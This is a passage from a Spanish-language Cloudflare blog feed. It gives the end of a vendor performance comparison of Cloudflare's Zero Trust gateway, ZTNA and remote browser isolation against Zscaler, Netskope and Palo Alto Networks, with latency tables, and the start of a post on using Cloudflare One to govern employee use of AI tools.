    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>Switzerland North</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>UAE Dubai</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>UK South</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>West US</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
</tbody>
</table><p>Antes, <a href="/es-es/network-performance-update-cio-edition-es-es/">cuando realizábamos estas pruebas</a>, solo probábamos desde una única región de Azure hasta cinco sitios web. Los marcos de pruebas existentes, como Catchpoint, no son adecuados para esta tarea porque las pruebas de rendimiento requieren que ejecutes el cliente SWG en el punto final de prueba. También necesitábamos asegurarnos de que todas las pruebas se ejecutan en máquinas similares en los mismos lugares para medir el rendimiento lo mejor posible. De este modo, podemos medir las respuestas de extremo a extremo procedentes de la misma ubicación en la que se ejecutan ambos entornos de prueba.</p><p>En nuestra configuración de prueba para esta ronda de evaluaciones, implementamos cuatro máquinas virtuales en 12 regiones de nube, una junto a la otra. Una de ellas ejecutaba Cloudflare WARP conectado a nuestra puerta de enlace, y las otras tres ejecutaban ZIA, Netskope y Palo Alto Networks. Estas máquinas virtuales realizaban solicitudes cada cinco minutos a los 11 sitios web diferentes que se mencionan a continuación y registraban los tiempos del navegador HTTP para saber cuánto tardaba cada solicitud. A partir de estos datos, podemos obtener una vista significativa del rendimiento, disponible para el usuario. A continuación, puedes ver una matriz completa de las ubicaciones desde las que hicimos las pruebas, los sitios web que utilizamos y qué proveedor fue más rápido:</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-1wig{font-weight:bold;text-align:left;vertical-align:top} .tg .tg-kziw{background-color:#F9CB9C;text-align:left;vertical-align:top} .tg .tg-e0oo{background-color:#EA9999;text-align:left;vertical-align:top} .tg .tg-f41v{background-color:#D9EAD3;font-weight:bold;text-align:left;vertical-align:top} .tg .tg-4dna{background-color:#B6D7A8;text-align:left;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top} .tg .tg-skn0{background-color:#A4C2F4;text-align:left;vertical-align:top}</p><p>Puntos finales</p><p>Regiones SWG</p><p>Shopify</p><p>Walmart</p><p>Zendesk</p><p>ServiceNow</p><p>Sitio de Azure</p><p>Slack</p><p>Zoom</p><p>Box</p><p>M365</p><p>GitHub</p><p>Bitbucket</p><p>Estados Unidos (este)</p><p>Cloudflare</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Estados Unidos (oeste)</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Estados Unidos (sur-centro)</p><p>Cloudflare</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Brasil (sur)</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Zscaler</p><p>Zscaler</p><p>Zscaler</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Reino Unido (sur)</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>India (centro)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Sudeste asiático</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Canadá (Central)</p><p>Cloudflare</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Cloudflare</p><p>Cloudflare</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Zscaler</p><p>Cloudflare</p><p>Zscaler</p><p>Suiza (norte)</p><p>Netskope</p><p>Zscaler</p><p>Zscaler</p><p>Cloudflare</p><p>Netskope</p><p>Netskope</p><p>Netskope</p><p>Netskope</p><p>Cloudflare</p><p>Cloudflare</p><p>Netskope</p><p>Australia (este)</p><p>Cloudflare</p><p>Cloudflare</p><p>Netskope</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Emiratos Árabes Unidos (Dubái)</p><p>Zscaler</p><p>Zscaler</p><p>Cloudflare</p><p>Cloudflare</p><p>Zscaler</p><p>Netskope</p><p>Palo Alto Networks</p><p>Zscaler</p><p>Zscaler</p><p>Netskope</p><p>Netskope</p><p>Sudáfrica (norte)</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Zscaler</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Zscaler</p><p>Palo Alto Networks</p><p>Palo Alto Networks</p><p>Las celdas en blanco indican que las pruebas realizadas en ese sitio web concreto no arrojaron resultados precisos o experimentaron fallos durante más del 50 % del periodo de prueba. Según estos datos, Cloudflare es generalmente más rápido, pero no tanto como nos gustaría. Todavía hay algunas áreas en las que tenemos que mejorar, concretamente en Sudáfrica, Emiratos Árabes Unidos y Brasil. Para la Semana aniversario que tendrá lugar en septiembre, queremos ser los más rápidos en todos estos sitios web en cada una de estas regiones, con lo que pasaremos de ser los más rápidos en el 54 % de las pruebas a serlo en el 79 % de ellas.</p><p>En resumen, Cloudflare Gateway sigue siendo la puerta de enlace web segura más rápida de Internet. Sin embargo, Zero Trust no es solo una puerta de enlace web segura. Hablemos del rendimiento de Cloudflare en los escenarios de acceso a la red Zero Trust.</p>
    <div>
      <h3>Acceso instantáneo (Zero Trust)</h3>
      <a href="#acceso-instantaneo-zero-trust">
        
      </a>
    </div>
    <p>El <a href="https://www.cloudflare.com/learning/access-management/what-is-access-control/">control de acceso</a> debe ser fácil e imperceptible para el usuario. El mejor cumplido para una solución Zero Trust es que los empleados apenas noten que está ahí. Los servicios como Cloudflare Access protegen las aplicaciones a través de la red pública de Internet, permitiendo así un acceso de autenticación basado en roles, en lugar de depender de una VPN para restringir y proteger las aplicaciones. Esta forma de gestión del acceso es más segura, pero con un servicio ZTNA eficaz, puede ser incluso más rápida.</p><p>Cloudflare supera a nuestros competidores en este ámbito, ya que ha demostrado ser un 46 % más rápido que Zscaler, un 56 % más rápido que Netskope y un 10 % más rápido que Palo Alto Networks:</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-1wig{font-weight:bold;text-align:left;vertical-align:top} .tg .tg-lqy6{text-align:right;vertical-align:top} .tg .tg-amwm{font-weight:bold;text-align:center;vertical-align:top} .tg .tg-l2oz{font-weight:bold;text-align:right;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Percentil 95 de los tiempos de respuesta HTTP de ZTNA</p><p>proveedor</p><p>Percentil 95 del tiempo de respuesta HTTP (m/s)</p><p>Cloudflare</p><p>1252</p><p>Zscaler</p><p>2388</p><p>Netskope</p><p>2974</p><p>Palo Alto Networks</p><p>1471</p><p>Para esta prueba, creamos aplicaciones alojadas en tres nubes diferentes en 12 ubicaciones distintas: AWS, GCP y Azure. Sin embargo, hay que señalar que Palo Alto Networks fue la excepción, ya que solo pudimos medirlas utilizando aplicaciones alojadas en una nube de dos regiones debido a problemas logísticos a la hora de organizar las pruebas: Estados Unidos (este) y Singapur.</p><p>Para cada una de estas aplicaciones, creamos pruebas desde Catchpoint que accedían a la aplicación desde 400 ubicaciones de todo el mundo. Cada uno de estos nodos de Catchpoint intentó dos acciones:</p><ul><li><p>Sesión nueva: inicio de sesión en una aplicación y recepción de un token de autenticación.</p></li><li><p>Sesión existente: actualización de la página e inicio de sesión con las credenciales obtenidas previamente.</p></li></ul><p>Queremos medir estos escenarios por separado, ya que si combináramos sesiones nuevas y existentes al analizar los valores del percentil 95, casi siempre estaríamos mirando a sesiones nuevas. Sin embargo, en aras de la exhaustividad, también mostraremos la latencia del percentil 95 de las sesiones nuevas y existentes en conjunto.</p><p>Cloudflare fue más rápido tanto en EE. UU. (este) como en Singapur, pero vamos a centrarnos en un par de regiones. Echemos un vistazo a una región donde los recursos están muy interconectados por igual entre los competidores: EE. UU. (este), concretamente Ashburn (Virginia).</p><p>En Ashburn (Virginia), Cloudflare supera ampliamente a Zscaler y Netskope en el percentil 95 del tiempo de respuesta HTTP de ZTNA:</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-1wig{font-weight:bold;text-align:left;vertical-align:top} .tg .tg-baqh{text-align:center;vertical-align:top} .tg .tg-lqy6{text-align:right;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Percentil 95 de los tiempos de respuesta HTTP (m/s) para aplicaciones alojadas en Ashburn (Virginia)</p><p>AWS (Estados Unidos - este)</p><p>Total (m/s)</p><p>Sesiones nuevas (ms)</p><p>Sesiones existentes (ms)</p><p>Cloudflare</p><p>2849</p><p>1749</p><p>1353</p><p>Zscaler</p><p>5340</p><p>2953</p><p>2491</p><p>Netskope</p><p>6513</p><p>3748</p><p>2897</p><p>Palo Alto Networks</p><p>Azure (Estados Unidos - este)</p><p>Cloudflare</p><p>1692</p><p>989</p><p>1169</p><p>Zscaler</p><p>5403</p><p>2951</p><p>2412</p><p>Netskope</p><p>6601</p><p>3805</p><p>2964</p><p>Palo Alto Networks</p><p>GCP (Estados Unidos - este)</p><p>Cloudflare</p><p>2811</p><p>1615</p><p>1320</p><p>Zscaler</p><p>Netskope</p><p>6694</p><p>3819</p><p>3023</p><p>Palo Alto Networks</p><p>2258</p><p>894</p><p>1464</p><p>Puedes observar que Palo Alto Networks supera a Cloudflare en las sesiones existentes (y, por tanto, en el percentil 95 general). Sin embargo, estas cifras son erróneas porque el comportamiento ZTNA de Palo Alto Networks es ligeramente distinto al nuestro, al de Zscaler o al de Netskope. Cuando realizan una nueva sesión, hace una interceptación completa de la conexión y devuelve una respuesta de sus procesadores en lugar de dirigir a los usuarios a la página de inicio de sesión de la aplicación a la que intentan acceder.</p><p>Esto significa que los tiempos de respuesta de la nueva sesión de Palo Alto Networks no miden realmente la latencia de extremo a extremo que buscamos. Por ello, sus cifras de latencia de sesión nueva y latencia de sesión total son erróneas, lo que significa que solo podemos compararnos significativamente con ellas en lo que respecta a la latencia de sesiones existentes. Si nos fijamos en estas últimas, cuando Palo Alto Networks actúa como acceso directo, Cloudflare sigue estando un 10 % por delante.</p><p>Lo mismo ocurre en Singapur, donde Cloudflare es un 50 % más rápido que Zscaler y Netskope, y también un 10 % más rápido que Palo Alto Networks en cuanto a las sesiones existentes:</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-1wig{font-weight:bold;text-align:left;vertical-align:top} .tg .tg-baqh{text-align:center;vertical-align:top} .tg .tg-lqy6{text-align:right;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Percentil 95 de los tiempos de respuesta HTTP (m/s) para aplicaciones alojadas en Singapur</p><p>AWS (Singapur)</p><p>Total (m/s)</p><p>Sesiones nuevas (ms)</p><p>Sesiones existentes (ms)</p><p>Cloudflare</p><p>2748</p><p>1568</p><p>1310</p><p>Zscaler</p><p>5349</p><p>3033</p><p>2500</p><p>Netskope</p><p>6402</p><p>3598</p><p>2990</p><p>Palo Alto Networks</p><p>Azure (Singapur)</p><p>Cloudflare</p><p>1831</p><p>1022</p><p>1181</p><p>Zscaler</p><p>5699</p><p>3037</p><p>2577</p><p>Netskope</p><p>6722</p><p>3834</p><p>3040</p><p>Palo Alto Networks</p><p>GCP (Singapur)</p><p>Cloudflare</p><p>2820</p><p>1641</p><p>1355</p><p>Zscaler</p><p>5499</p><p>3037</p><p>2412</p><p>Netskope</p><p>6525</p><p>3713</p><p>2992</p><p>Palo Alto Networks</p><p>2293</p><p>922</p><p>1476</p><p>Una crítica a estos datos podría ser que estamos añadiendo los tiempos de todos los nodos Catchpoint juntos en el percentil 95, y no estamos examinando el percentil 95 de los nodos Catchpoint en la misma región que la aplicación. También lo hemos analizado, y el rendimiento ZTNA de Cloudflare sigue siendo mejor. Si solo nos fijamos en los nodos Catchpoint con sede en Norteamérica, el rendimiento de Cloudflare es un 50 % superior al de Netskope, un 40 % mejor que el de Zscaler y un 10 % mayor que Palo Alto Networks en el percentil 95 para conexiones en caliente:</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-1wig{font-weight:bold;text-align:left;vertical-align:top} .tg .tg-lqy6{text-align:right;vertical-align:top} .tg .tg-amwm{font-weight:bold;text-align:center;vertical-align:top} .tg .tg-l2oz{font-weight:bold;text-align:right;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Percentil 95 de los tiempos de respuesta HTTP de ZTNA para conexiones en caliente con ubicaciones de prueba en Norteamérica</p><p>proveedor</p><p>Percentil 95 del tiempo de respuesta HTTP (m/s)</p><p>Cloudflare</p><p>810</p><p>Zscaler</p><p>1290</p><p>Netskope</p><p>1351</p><p>Palo Alto Networks</p><p>871</p><p>Por último, algo que queríamos mostrar sobre el rendimiento de nuestra solución ZTNA era el rendimiento de Cloudflare por nube y por región. El siguiente gráfico muestra la matriz de proveedores de nubes y regiones probadas:</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-1wig{font-weight:bold;text-align:left;vertical-align:top} .tg .tg-kziw{background-color:#F9CB9C;text-align:left;vertical-align:top} .tg .tg-4dna{background-color:#B6D7A8;text-align:left;vertical-align:top} .tg .tg-7yig{background-color:#FFF;text-align:center;vertical-align:top} .tg .tg-ktyi{background-color:#FFF;text-align:left;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top} .tg .tg-skn0{background-color:#A4C2F4;text-align:left;vertical-align:top}</p><p>Proveedor de ZTNA más rápido en cada proveedor de nube y región por percentil 95 del tiempo de respuesta HTTP</p><p>AWS</p><p>Azure</p><p>GCP</p><p>Australia (este)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Brasil (sur)</p><p>Cloudflare</p><p>Cloudflare</p><p>n/a</p><p>Canadá (Central)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>India (centro)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Estados Unidos (este)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Sudáfrica (norte)</p><p>Cloudflare</p><p>Cloudflare</p><p>n/a</p><p>Estados Unidos (sur-centro)</p><p>n/a</p><p>Cloudflare</p><p>Zscaler</p><p>Sudeste asiático</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Suiza (norte)</p><p>n/a</p><p>n/a</p><p>Cloudflare</p><p>Emiratos Árabes Unidos (Dubái)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Reino Unido (sur)</p><p>Cloudflare</p><p>Cloudflare</p><p>Netskope</p><p>Estados Unidos (oeste)</p><p>Cloudflare</p><p>Cloudflare</p><p>n/a</p><p>Identificamos algunas máquinas virtuales en algunas nubes que funcionaron mal y no arrojaron datos precisos. Sin embargo de las 30 regiones de nubes disponibles con datos precisos, Cloudflare fue el proveedor de ZT más rápido en 28 de ellas, lo que significa que fuimos más rápidos en el 93 % de las regiones de nubes probadas.</p><p>En resumen, Cloudflare también proporciona la mejor experiencia de acceso a la red Zero Trust. Pero, ¿qué hay del aislamiento remoto del navegador (RBI), la otra pieza del rompecabezas?</p>
    <div>
      <h3>Aislamiento remoto del navegador, un navegador seguro alojado en la nube</h3>
      <a href="#aislamiento-remoto-del-navegador-un-navegador-seguro-alojado-en-la-nube">
        
      </a>
    </div>
    <p>Los productos de aislamiento remoto del navegador tienen una fuerte dependencia de la red pública: si tu conexión al producto de aislamiento remoto del navegador no es buena, tu experiencia con el navegador te parecerá rara y lenta. El aislamiento remoto del navegador depende extremadamente del rendimiento para que la experiencia de los usuarios sea fluida y normal: si todo es tan rápido como debería, los usuarios no deberían notar que están utilizando esta función.</p><p>Para esta prueba, volvemos a comparar Cloudflare con Zscaler. Aunque Netskope tiene una solución RBI, no pudimos probarla porque requiere un cliente SWG, lo que significa que no podríamos obtener con total exactitud las ubicaciones de prueba como haríamos al probar Cloudflare y Zscaler. Nuestras pruebas mostraron que Cloudflare es un 64 % más rápido que Zscaler en escenarios de navegación remota. A continuación, te mostramos una matriz del proveedor más rápido por nube y por región para nuestras pruebas de RBI:</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-1wig{font-weight:bold;text-align:left;vertical-align:top} .tg .tg-kziw{background-color:#F9CB9C;text-align:left;vertical-align:top} .tg .tg-7yig{background-color:#FFF;text-align:center;vertical-align:top} .tg .tg-ktyi{background-color:#FFF;text-align:left;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Proveedor de RBI más rápido en cada proveedor de nube y región por percentil 95 del tiempo de respuesta HTTP</p><p>AWS</p><p>Azure</p><p>GCP</p><p>Australia (este)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Brasil (sur)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Canadá (Central)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>India (centro)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Estados Unidos (este)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Sudáfrica (norte)</p><p>Cloudflare</p><p>Cloudflare</p><p>Estados Unidos (sur-centro)</p><p>Cloudflare</p><p>Cloudflare</p><p>Sudeste asiático</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Suiza (norte)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Emiratos Árabes Unidos (Dubái)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Reino Unido (sur)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Estados Unidos (oeste)</p><p>Cloudflare</p><p>Cloudflare</p><p>Cloudflare</p><p>Este gráfico muestra los resultados de todas las pruebas realizadas en Cloudflare y Zscaler a aplicaciones alojadas en tres nubes diferentes en 12 ubicaciones distintas desde los mismos 400 nodos Catchpoint de las pruebas sobre ZTNA. En todos los escenarios, Cloudflare fue más rápido. De hecho, ninguna prueba contra un punto final protegido por Cloudflare tuvo un percentil 95 del tiempo de respuesta HTTP superior a 2105 m/s, mientras que ningún punto final protegido por Zscaler tuvo un percentil 95 del tiempo de respuesta HTTP inferior a 5000 m/s.</p><p>Para obtener estos datos, aprovechamos las mismas máquinas virtuales para alojar aplicaciones a las que se accedía a través de los servicios RBI. Cada nodo Catchpoint intentaba acceder a la aplicación a través de RBI, recibía credenciales de autenticación y, a continuación, intentaba acceder a la página con las credenciales. Analizamos las mismas sesiones nuevas y existentes que para ZTNA, y Cloudflare resultó ser más rápido tanto en los escenarios de sesiones nuevas como en los de sesiones existentes.</p>
    <div>
      <h3>Mayor rapidez</h3>
      <a href="#mayor-rapidez">
        
      </a>
    </div>
    <p>Los clientes de nuestras soluciones Zero Trust quieren que seamos rápidos no porque quieran acelerar el acceso a Internet, sino porque quieren saber que la productividad de los empleados no se verá afectada por el cambio a Cloudflare. Eso no significa necesariamente que lo más importante para nosotros sea ser más rápidos que nuestros competidores, aunque lo somos. Lo que más nos importa es mejorar nuestra experiencia para que nuestros usuarios se sientan cómodos sabiendo que nos tomamos en serio su experiencia. Cuando en septiembre publiquemos las nuevas cifras de la Semana aniversario y seamos más rápidos que antes, no solo significará que hemos mejorado los resultados, sino que estamos evaluando y mejorando constantemente nuestro servicio para ofrecer la mejor experiencia a nuestros clientes. Nos importa más que nuestros clientes de los Emiratos Árabes Unidos tengan una mejor experiencia con Office365 que superar a un competidor en una prueba. Te enseñamos estas cifras para demostrarte que nos importa el rendimiento, y que nos comprometemos a mejorar tu experiencia, estés donde estés.</p> ]]></content:encoded>
            <category><![CDATA[Speed Week (ES)]]></category>
            <category><![CDATA[Velocidad]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Rendimiento]]></category>
            <category><![CDATA[Network Performance Update]]></category>
            <category><![CDATA[Cloudflare Gateway]]></category>
            <guid isPermaLink="false">runIOwC2QibdPDiLwzcK4</guid>
            <dc:creator>David Tuber</dc:creator>
        </item>
        <item>
            <title><![CDATA[Un conjunto completo de herramientas de seguridad Zero Trust para aprovechar al máximo la IA]]></title>
            <link>https://blog.cloudflare.com/es-es/zero-trust-ai-security/</link>
            <pubDate>Mon, 15 May 2023 13:00:56 GMT</pubDate>
            <description><![CDATA[ Protege el uso de las herramientas de IA con Cloudflare One ]]></description>
            <content:encoded><![CDATA[ <p><b>Conjunto de herramientas de Cloudflare One para ayudar a tus equipos a utilizar los servicios de IA de forma segura</b></p><p>Cloudflare One ofrece a todos los equipos de trabajo la posibilidad de utilizar de forma segura las mejores herramientas de Internet sin problemas de gestión o rendimiento. Nos complace anunciar Cloudflare One para IA, un nuevo conjunto de funciones que ayudan a tu equipo a desarrollar con los últimos servicios de IA sin dejar de mantener una postura de seguridad Zero Trust.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4OSWlU9VnnjLJ7TKZRhesn/ce969f4780a674a123bc0f258de651ee/image1-18.png" />
            
            </figure>
    <div>
      <h3>Modelos de lenguaje de gran tamaño, el nuevo desafío para la seguridad</h3>
      <a href="#modelos-de-lenguaje-de-gran-tamano-el-nuevo-desafio-para-la-seguridad">
        
      </a>
    </div>
    <p>Un modelo de lenguaje de gran tamaño (LLM), como GPT de OpenAI o Bard de Google, consiste en una red neuronal entrenada con un conjunto de datos para predecir y generar texto a partir de una pregunta. Los usuarios pueden hacer preguntas, solicitar opiniones y apoyarse en el servicio para crear resultados, desde poesía hasta <a href="https://blog.samrhea.com/posts/2022/five-minute-ai-site">aplicaciones de Cloudflare Workers</a>.</p><p>Las herramientas también tienen un asombroso parecido con un ser humano real. Al igual que ocurre en algunas conversaciones personales de la vida real, compartir en exceso se puede convertir en un <a href="https://mashable.com/article/samsung-chatgpt-leak-details">grave problema</a> con estos servicios de IA. Este riesgo se multiplica debido a los tipos de casos de uso en los que se desarrollan los modelos LLM. Estas herramientas pueden ayudar a los desarrolladores a resolver problemas de codificación difíciles o ayudar a los profesionales de la información a crear informes resumidos a partir de notas desordenadas. Aunque son útiles, cada solicitud se convierte en un dato que sale del control de tu organización.</p><p>En algunos casos, la respuesta a herramientas como ChatGPT ha sido intentar prohibir el servicio directamente, ya sea a nivel corporativo o en <a href="https://www.reuters.com/technology/germany-principle-could-block-chat-gpt-if-needed-data-protection-chief-2023-04-03/">todo un país</a>. No creemos que debas hacerlo. El objetivo de Cloudflare One es permitirte utilizar con seguridad las herramientas que necesitas, independientemente de donde se alojen, sin afectar al rendimiento. Estas funciones te resultarán familiares si ya utilizas los productos Zero Trust de Cloudflare One, pero nos complace explicarte casos en los que puedes utilizar las herramientas disponibles ahora mismo para que tu equipo pueda aprovechar las últimas funciones de LLM.</p>
    <div>
      <h3>Mide el uso</h3>
      <a href="#mide-el-uso">
        
      </a>
    </div>
    <p>Las aplicaciones SaaS facilitan que cualquier usuario se registre y empiece a realizar pruebas. Esa ventaja también convierte a estas herramientas en un inconveniente para los presupuestos informáticos y las políticas de seguridad. Los equipos se refieren a este problema como "<a href="/es-es/introducing-shadow-it-discovery-es-es/">Shadow IT</a>", la implementación de aplicaciones y servicios fuera de los canales autorizados en una organización.</p><p>En lo que respecta a los presupuestos, hemos oído hablar de clientes pioneros que saben que los miembros de su equipo están empezando a experimentar con el LLM, pero no están seguros de cómo abordar la decisión en cuanto a las licencias comerciales se refiere. ¿Qué servicios y funciones necesitan sus usuarios y cuántas licencias deben adquirir?</p><p>En cuanto a la seguridad, las herramientas de IA pueden ser revolucionarias para hacer el trabajo, pero terribles para las políticas de control de datos. Los miembros de los equipos tratan estas herramientas como cajas de resonancia para problemas acuciantes. Los servicios invitan a los usuarios a proponer preguntas o problemas. A veces, el contexto dentro de esas solicitudes puede contener información confidencial que nunca debería salir de una organización. Incluso si los equipos seleccionan y aprueban un único proveedor, los miembros de tu organización podrían preferir otra herramienta de IA y utilizarla en su flujo de trabajo.</p><p>Los clientes de Cloudflare One de cualquier plan <a href="https://developers.cloudflare.com/cloudflare-one/analytics/access/">ya pueden revisar</a> el uso de las herramientas IA. Tu departamento de informática puede implementar Cloudflare Gateway y observar pasivamente cuántos usuarios seleccionan los servicios, y qué servicios son, como forma de empezar a analizar los planes de licencias para empresas.</p><p>Los administradores también pueden bloquear el uso de estos servicios con un solo clic, pero ese no es nuestro objetivo hoy. Puede que quieras utilizar esta función si seleccionas ChatGPT como modelo autorizado y quieres asegurarte de que los miembros del equipo no utilizan otras alternativas, pero esperamos que no bloquees todos estos servicios directamente. La prioridad de Cloudflare es ofrecerte la posibilidad de utilizar estas herramientas de forma segura.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2uHrL23faFCHE9540fQFp0/c7fbebb109d03999ebaf94fc39890805/image6-5.png" />
            
            </figure>
    <div>
      <h3>Controla el acceso a las API</h3>
      <a href="#controla-el-acceso-a-las-api">
        
      </a>
    </div>
    <p>Cuando nuestros equipos empezaron a experimentar con el servicio ChatGPT de OpenAI, nos sorprendió lo que ya sabía sobre Cloudflare. Pedimos a ChatGPT que creara aplicaciones con <a href="https://workers.cloudflare.com/">Cloudflare Workers</a> o que nos guiara sobre cómo configurar una política de <a href="https://www.cloudflare.com/products/zero-trust/access/">Cloudflare Access</a> y, en la mayoría de los casos, los resultados fueron exactos y útiles.</p><p>En algunos casos, los resultados no acertaron. Las herramientas de IA utilizaban información obsoleta o hacíamos preguntas sobre funciones que se habían lanzado recientemente. Afortunadamente, estos servicios de IA pueden aprender y nosotros podemos ayudar. Podemos entrenar estos modelos con entradas específicas y <a href="https://openai.com/blog/chatgpt-plugins">conectar complementos</a> para ofrecer a nuestros clientes mejores experiencias guiadas por la IA cuando utilicen los servicios de Cloudflare.</p><p>Hemos oído a clientes que quieren hacer lo mismo y, como nosotros, necesitan compartir de forma segura los datos de entrenamiento y conceder acceso a los complementos 